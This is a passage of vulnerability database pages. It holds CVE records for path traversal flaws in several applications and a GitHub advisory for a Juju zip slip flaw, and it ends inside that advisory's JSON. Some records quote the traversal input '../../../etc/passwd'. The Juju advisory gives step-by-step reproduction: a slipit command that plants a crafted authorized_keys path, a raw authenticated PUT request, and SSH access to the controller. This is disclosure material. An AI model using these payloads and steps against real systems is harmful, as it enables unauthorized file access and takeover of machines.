Hancomwith anySign4PC Affected: 1.1.1.0
Affected: 1.1.2.6
Affected: 1.1.2.7
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T09:48:23.706Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36344"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "platforms": [
            "Windows"
          ],
          "product": "anySign4PC",
          "vendor": "Hancomwith",
          "versions": [
            {
              "status": "affected",
              "version": "1.1.1.0"
            },
            {
              "status": "affected",
              "version": "1.1.2.6"
            },
            {
              "status": "affected",
              "version": "1.1.2.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Using the parameter of getPFXFolderList function, attackers can see the information of authorization certification and delete the files. It occurs because the parameter contains path traversal characters(ie. \u0027../../../\u0027)"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-11-22T14:43:26.000Z",
        "orgId": "cdd7a122-0fae-4202-8d86-14efbacc2863",
        "shortName": "krcert"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36344"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "title": "anySign directory traversal vulnerability",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "vuln@krcert.or.kr",
          "ID": "CVE-2020-7882",
          "STATE": "PUBLIC",
          "TITLE": "anySign directory traversal vulnerability"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "anySign4PC",
                      "version": {
                        "version_data": [
                          {
                            "platform": "Windows",
                            "version_affected": "=",
                            "version_name": "1.1.1.0",
                            "version_value": "1.1.1.0"
                          },
                          {
                            "platform": "Windows",
                            "version_affected": "=",
                            "version_name": "1.1.2.6",
                            "version_value": "1.1.2.6"
                          },
                          {
                            "platform": "Windows",
                            "version_affected": "=",
                            "version_name": "1.1.2.7",
                            "version_value": "1.1.2.7"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Hancomwith"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Using the parameter of getPFXFolderList function, attackers can see the information of authorization certification and delete the files. It occurs because the parameter contains path traversal characters(ie. \u0027../../../\u0027)"
            }
          ]
        },
        "generator": {
          "engine": "Vulnogram 0.0.9"
        },
        "impact": {
          "cvss": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-24 Path Traversal: \u0027../filedir\u0027"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36344",
              "refsource": "MISC",
              "url": "https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=36344"
            }
          ]
        },
        "source": {
          "discovery": "UNKNOWN"
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cdd7a122-0fae-4202-8d86-14efbacc2863",
    "assignerShortName": "krcert",
    "cveId": "CVE-2020-7882",
    "datePublished": "2021-11-22T14:43:26.000Z",
    "dateReserved": "2020-01-22T00:00:00.000Z",
    "dateUpdated": "2024-08-04T09:48:23.706Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2019-25087 (GCVE-0-2019-25087)

Vulnerability from cvelistv5 – Published: 2022-12-27 08:42 – Updated: 2024-11-19 19:47
VLAI
Title
RamseyK httpserver URI ResourceHost.cpp getResource path traversal
Summary
A vulnerability was found in RamseyK httpserver. It has been rated as critical. This issue affects the function ResourceHost::getResource of the file src/ResourceHost.cpp of the component URI Handler. The manipulation of the argument uri leads to path traversal: '../filedir'. The attack may be initiated remotely. The name of the patch is 1a0de56e4dafff9c2f9c8f6b130a764f7a50df52. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216863.
SSVC
Exploitation: none Automatable: yes Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
  • CWE-24 - Path Traversal: '../filedir'
Assigner
References
URL Tags
https://vuldb.com/?id.216863 vdb-entrytechnical-description
https://vuldb.com/?ctiid.216863 signaturepermissions-required
https://github.com/RamseyK/httpserver/commit/1a0d… patch
Impacted products
Vendor Product Version
RamseyK httpserver Affected: n/a
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T03:00:19.215Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.216863"
          },
          {
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.216863"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://github.com/RamseyK/httpserver/commit/1a0de56e4dafff9c2f9c8f6b130a764f7a50df52"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2019-25087",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-19T19:47:46.694968Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-19T19:47:57.738Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "modules": [
            "URI Handler"
          ],
          "product": "httpserver",
          "vendor": "RamseyK",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in RamseyK httpserver. It has been rated as critical. This issue affects the function ResourceHost::getResource of the file src/ResourceHost.cpp of the component URI Handler. The manipulation of the argument uri leads to path traversal: \u0027../filedir\u0027. The attack may be initiated remotely. The name of the patch is 1a0de56e4dafff9c2f9c8f6b130a764f7a50df52. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216863."
        },
        {
          "lang": "de",
          "value": "Eine Schwachstelle wurde in RamseyK httpserver ausgemacht. Sie wurde als kritisch eingestuft. Betroffen davon ist die Funktion ResourceHost::getResource der Datei src/ResourceHost.cpp der Komponente URI Handler. Durch das Beeinflussen des Arguments uri mit unbekannten Daten kann eine path traversal: \u0027../filedir\u0027-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei \u00fcber das Netzwerk erfolgen. Der Patch wird als 1a0de56e4dafff9c2f9c8f6b130a764f7a50df52 bezeichnet. Als bestm\u00f6gliche Massnahme wird Patching empfohlen."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-27T08:42:42.309Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.216863"
        },
        {
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.216863"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/RamseyK/httpserver/commit/1a0de56e4dafff9c2f9c8f6b130a764f7a50df52"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2022-12-27T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2022-12-27T01:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2022-12-27T09:47:39.000Z",
          "value": "VulDB last update"
        }
      ],
      "title": "RamseyK httpserver URI ResourceHost.cpp getResource path traversal"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2019-25087",
    "datePublished": "2022-12-27T08:42:42.309Z",
    "dateReserved": "2022-12-27T08:41:11.243Z",
    "dateUpdated": "2024-11-19T19:47:57.738Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2018-25094 (GCVE-0-2018-25094)

Vulnerability from cvelistv5 – Published: 2023-12-03 10:31 – Updated: 2024-08-05 12:33
VLAI
Title
ระบบบัญชีออนไลน์ Online Accounting System image.php path traversal
Summary
A vulnerability was found in ระบบบัญชีออนไลน์ Online Accounting System up to 1.4.0 and classified as problematic. This issue affects some unknown processing of the file ckeditor/filemanager/browser/default/image.php. The manipulation of the argument fid with the input ../../../etc/passwd leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The identifier of the patch is 9d9618422b980335bb30be612ea90f4f56cb992c. It is recommended to upgrade the affected component. The identifier VDB-246641 was assigned to this vulnerability.
CWE
  • CWE-24 - Path Traversal: '../filedir'
Assigner
References
URL Tags
https://vuldb.com/?id.246641 vdb-entrytechnical-description
https://vuldb.com/?ctiid.246641 signaturepermissions-required
https://github.com/59160781/project/commit/9d9618… patch
Impacted products
Vendor Product Version
ระบบบัญชีออนไลน์ Online Accounting System Affected: 1.0
Affected: 1.1
Affected: 1.2
Affected: 1.3
Affected: 1.4
Create a notification for this product.
Credits
VulDB GitHub Commit Analyzer
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T12:33:49.018Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.246641"
          },
          {
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.246641"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://github.com/59160781/project/commit/9d9618422b980335bb30be612ea90f4f56cb992c"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Online Accounting System",
          "vendor": "\u0e23\u0e30\u0e1a\u0e1a\u0e1a\u0e31\u0e0d\u0e0a\u0e35\u0e2d\u0e2d\u0e19\u0e44\u0e25\u0e19\u0e4c",
          "versions": [
            {
              "status": "affected",
              "version": "1.0"
            },
            {
              "status": "affected",
              "version": "1.1"
            },
            {
              "status": "affected",
              "version": "1.2"
            },
            {
              "status": "affected",
              "version": "1.3"
            },
            {
              "status": "affected",
              "version": "1.4"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "tool",
          "value": "VulDB GitHub Commit Analyzer"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in \u0e23\u0e30\u0e1a\u0e1a\u0e1a\u0e31\u0e0d\u0e0a\u0e35\u0e2d\u0e2d\u0e19\u0e44\u0e25\u0e19\u0e4c Online Accounting System up to 1.4.0 and classified as problematic. This issue affects some unknown processing of the file ckeditor/filemanager/browser/default/image.php. The manipulation of the argument fid with the input ../../../etc/passwd leads to path traversal: \u0027../filedir\u0027. The exploit has been disclosed to the public and may be used. Upgrading to version 2.0.0 is able to address this issue. The identifier of the patch is 9d9618422b980335bb30be612ea90f4f56cb992c. It is recommended to upgrade the affected component. The identifier VDB-246641 was assigned to this vulnerability."
        },
        {
          "lang": "de",
          "value": "Eine problematische Schwachstelle wurde in \u0e23\u0e30\u0e1a\u0e1a\u0e1a\u0e31\u0e0d\u0e0a\u0e35\u0e2d\u0e2d\u0e19\u0e44\u0e25\u0e19\u0e4c Online Accounting System bis 1.4.0 gefunden. Es geht hierbei um eine nicht n\u00e4her spezifizierte Funktion der Datei ckeditor/filemanager/browser/default/image.php. Durch Beeinflussen des Arguments fid mit der Eingabe ../../../etc/passwd mit unbekannten Daten kann eine path traversal: \u0027../filedir\u0027-Schwachstelle ausgenutzt werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung. Ein Aktualisieren auf die Version 2.0.0 vermag dieses Problem zu l\u00f6sen. Der Patch wird als 9d9618422b980335bb30be612ea90f4f56cb992c bezeichnet. Als bestm\u00f6gliche Massnahme wird das Einspielen eines Upgrades empfohlen."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 2.7,
            "vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-03T10:31:03.118Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.246641"
        },
        {
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.246641"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/59160781/project/commit/9d9618422b980335bb30be612ea90f4f56cb992c"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2018-03-18T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2018-03-18T00:00:00.000Z",
          "value": "Countermeasure disclosed"
        },
        {
          "lang": "en",
          "time": "2023-12-02T01:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2023-12-02T08:47:13.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "\u0e23\u0e30\u0e1a\u0e1a\u0e1a\u0e31\u0e0d\u0e0a\u0e35\u0e2d\u0e2d\u0e19\u0e44\u0e25\u0e19\u0e4c Online Accounting System image.php path traversal"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2018-25094",
    "datePublished": "2023-12-03T10:31:03.118Z",
    "dateReserved": "2023-12-02T07:41:58.211Z",
    "dateUpdated": "2024-08-05T12:33:49.018Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-125033 (GCVE-0-2014-125033)

Vulnerability from cvelistv5 – Published: 2023-01-02 07:51 – Updated: 2024-08-06 14:10
VLAI
Title
rails-cv-app uploaded_files_controller.rb path traversal
Summary
A vulnerability was found in rails-cv-app. It has been rated as problematic. Affected by this issue is some unknown functionality of the file app/controllers/uploaded_files_controller.rb. The manipulation with the input ../../../etc/passwd leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. The patch is identified as 0d20362af0a5f8a126f67c77833868908484a863. It is recommended to apply a patch to fix this issue. VDB-217178 is the identifier assigned to this vulnerability.
CWE
  • CWE-24 - Path Traversal: '../filedir'
Assigner
References
URL Tags
https://vuldb.com/?id.217178 vdb-entrytechnical-description
https://vuldb.com/?ctiid.217178 signaturepermissions-required
https://github.com/bertrand-caron/rails-cv-app/co… patch
Impacted products
Vendor Product Version
n/a rails-cv-app Affected: n/a
Credits
VulDB GitHub Commit Analyzer
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T14:10:56.589Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "vdb-entry",
              "technical-description",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.217178"
          },
          {
            "tags": [
              "signature",
              "permissions-required",
              "x_transferred"
            ],
            "url": "https://vuldb.com/?ctiid.217178"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://github.com/bertrand-caron/rails-cv-app/commit/0d20362af0a5f8a126f67c77833868908484a863"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "rails-cv-app",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "tool",
          "value": "VulDB GitHub Commit Analyzer"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability was found in rails-cv-app. It has been rated as problematic. Affected by this issue is some unknown functionality of the file app/controllers/uploaded_files_controller.rb. The manipulation with the input ../../../etc/passwd leads to path traversal: \u0027../filedir\u0027. The exploit has been disclosed to the public and may be used. The patch is identified as 0d20362af0a5f8a126f67c77833868908484a863. It is recommended to apply a patch to fix this issue. VDB-217178 is the identifier assigned to this vulnerability."
        },
        {
          "lang": "de",
          "value": "Eine problematische Schwachstelle wurde in rails-cv-app ausgemacht. Betroffen davon ist ein unbekannter Prozess der Datei app/controllers/uploaded_files_controller.rb. Mittels dem Manipulieren mit der Eingabe ../../../etc/passwd mit unbekannten Daten kann eine path traversal: \u0027../filedir\u0027-Schwachstelle ausgenutzt werden. Der Exploit steht zur \u00f6ffentlichen Verf\u00fcgung. Der Patch wird als 0d20362af0a5f8a126f67c77833868908484a863 bezeichnet. Als bestm\u00f6gliche Massnahme wird Patching empfohlen."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 3.5,
            "baseSeverity": "LOW",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 2.7,
            "vectorString": "AV:A/AC:L/Au:S/C:P/I:N/A:N",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-24",
              "description": "CWE-24 Path Traversal: \u0027../filedir\u0027",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-10-20T05:57:08.811Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/?id.217178"
        },
        {
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/?ctiid.217178"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/bertrand-caron/rails-cv-app/commit/0d20362af0a5f8a126f67c77833868908484a863"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2023-01-02T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2023-01-02T00:00:00.000Z",
          "value": "CVE reserved"
        },
        {
          "lang": "en",
          "time": "2023-01-02T01:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2023-01-26T20:19:57.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "rails-cv-app uploaded_files_controller.rb path traversal"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2014-125033",
    "datePublished": "2023-01-02T07:51:16.499Z",
    "dateReserved": "2023-01-02T07:48:48.917Z",
    "dateUpdated": "2024-08-06T14:10:56.589Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-24CH-W38V-XMH8

Vulnerability from github – Published: 2025-07-09 15:29 – Updated: 2025-08-26 20:20
VLAI
Summary
Juju zip slip vulnerability via authenticated endpoint
Details

Impact

Any user with a Juju account on a controller can upload a charm to the /charms endpoint. No specific permissions are required - it's just sufficient for the user to exist in the controller user database. A charm which exploits the zip slip vulnerability may be used to allow such a user to get access to a machine running a unit using the affected charm.

Details

A controller exposes three charm-related HTTP API endpoints, as follows: - PUT/GET https://:17070/model-/charms/- - POST/GET https://:17070/model-/charms - GET https://:17070/charms

These endpoints require Basic HTTP authentication credentials and will accept any valid user within the context of the controller. A user that has no specific permission or access granted can call all of these APIs.

To reproduce:

juju bootstrap
juju add-user testuser
juju change-user-password testuser

Download the ZIP file of an arbitrary charm eg https://github.com/juju/hello-juju-charm

Download and install the following tool: https://github.com/usdAG/slipit

Run the following command to generate a new SSH key pair: ssh-keygen

Copy the contents of the newly created public key into a file called authorized_keys

Run the following command to inject the malicious path into the ZIP file:

slipit hello.zip authorized_keys --separator ../../../../../../home/
ubuntu/.ssh/

Send the PUT request below to a model on the target controller. Note the following: - the model UUID and controller IP address in the request must be updated - the Juju-Curl header needs to be sent with a value that starts with the “local:” string - the PUT body content should have the exact contents of the ZIP file - the Basic Authorization header should be tied to the user that was created above - the first time that the request is sent, an error will be returned that states that the SHA hash in the URL is invalid. When this occurs, copy the value in the response and replace it in the final part of the URL (i.e. pathtw-<updated-sha>) -

PUT /model-34bb5ef0-5a3e-41d7-873c-2f884adf606d/charms/pathtw-5c9f25c
HTTP/1.1
Host: 10.4.154.217:17070
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko
/20100101 Firefox/135.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
Content-Length: 40021
Content-Type: application/zip
Juju-Curl: local:pathtw
Authorization: Basic dXNlci10ZXN0dXNlcjpwYXNzd29yZA==
<ZIP BODY Content>

Observe that the response states that the charm has been uploaded.

Attempt to SSH to the controller by using the private key that was generated above.

Observe that it is possible to authenticate because the file has been overwritten.

Code

The /charms handlers are registered here https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L897 https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L990

And the only auth required is that the incoming request be for an authenticated user

https://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L754

but no specific permission checks are done.

Workarounds

There are no known workarounds.

References

F-02

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/juju/juju"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20250619215741-6356e984b82a"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-53513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-24"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-09T15:29:03Z",
    "nvd_published_at": "2025-07-08T17:16:04Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nAny user with a Juju account on a controller can upload a charm to the /charms endpoint.\nNo specific permissions are required - it\u0027s just sufficient for the user to exist in the controller user database.\nA charm which exploits the zip slip vulnerability may be used to allow such a user to get access to a machine running a unit using the affected charm.\n\n### Details\n\nA controller exposes three charm-related HTTP API endpoints, as follows:\n- PUT/GET https://\u003ccontroller-ip\u003e:17070/model-\u003cmodel-uuid\u003e/charms/\u003cnameofcharm\u003e-\u003chashofcharm\u003e\n- POST/GET https://\u003ccontroller-ip\u003e:17070/model-\u003cmodel-uuid\u003e/charms\n- GET https://\u003ccontroller-ip\u003e:17070/charms\n\nThese endpoints require Basic HTTP authentication credentials and will accept any valid user within the context of the controller. A user that has no specific permission or access granted can call all of these APIs.\n\nTo reproduce:\n\n```\njuju bootstrap\njuju add-user testuser\njuju change-user-password testuser\n```\n\nDownload the ZIP file of an arbitrary charm eg [https://github.com/juju/hello-juju-charm](https://github.com/juju/hello-juju-charm)\n\nDownload and install the following tool: [https://github.com/usdAG/slipit](https://github.com/usdAG/slipit)\n\nRun the following command to generate a new SSH key pair: `ssh-keygen`\n\nCopy the contents of the newly created public key into a file called `authorized_keys`\n\nRun the following command to inject the malicious path into the ZIP file:\n```\nslipit hello.zip authorized_keys --separator ../../../../../../home/\nubuntu/.ssh/\n```\n\nSend the PUT request below to a model on the target controller. Note the following:\n- the model UUID and controller IP address in the request must be updated\n- the Juju-Curl header needs to be sent with a value that starts with the \u201clocal:\u201d string\n- the PUT body content should have the exact contents of the ZIP file\n- the Basic Authorization header should be tied to the user that was created above\n- the first time that the request is sent, an error will be returned that states that the SHA hash in the URL is invalid. When this occurs, copy the value in the response and replace it in the final part of the URL (i.e. `pathtw-\u003cupdated-sha\u003e`)\n- \n```\nPUT /model-34bb5ef0-5a3e-41d7-873c-2f884adf606d/charms/pathtw-5c9f25c\nHTTP/1.1\nHost: 10.4.154.217:17070\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko\n/20100101 Firefox/135.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: none\nSec-Fetch-User: ?1\nPriority: u=0, i\nTe: trailers\nConnection: keep-alive\nContent-Length: 40021\nContent-Type: application/zip\nJuju-Curl: local:pathtw\nAuthorization: Basic dXNlci10ZXN0dXNlcjpwYXNzd29yZA==\n\u003cZIP BODY Content\u003e\n```\n\nObserve that the response states that the charm has been uploaded.\n\nAttempt to SSH to the controller by using the private key that was generated above.\n\nObserve that it is possible to authenticate because the file has been overwritten.\n\n### Code\n\nThe /charms handlers are registered here\nhttps://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L897\nhttps://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L990\n\nAnd the only auth required is that the incoming request be for an authenticated user\n\nhttps://github.com/juju/juju/blob/3.6/apiserver/apiserver.go#L754\n\nbut no specific permission checks are done.\n\n### Workarounds\nThere are no known workarounds.\n\n### References\n[F-02](https://drive.google.com/file/d/1pHRNiaA8LyMVJYwIyTqelsqJ9FmImDf0/view)",
  "id": "GHSA-24ch-w38v-xmh8",
  "modified": "2025-08-26T20:20:46Z",
  "published": "2025-07-09T15:29:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/security/advisories/GHSA-24ch-w38v-xmh8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53513"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/commit/6356e984b82a4a7b9771ff5e51e297ad62f3b405"
    },
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/commit/ff39557a137c0e95d4cd3553b0f19c859c6f5d8e"
    },
    {
      "type": "WEB",
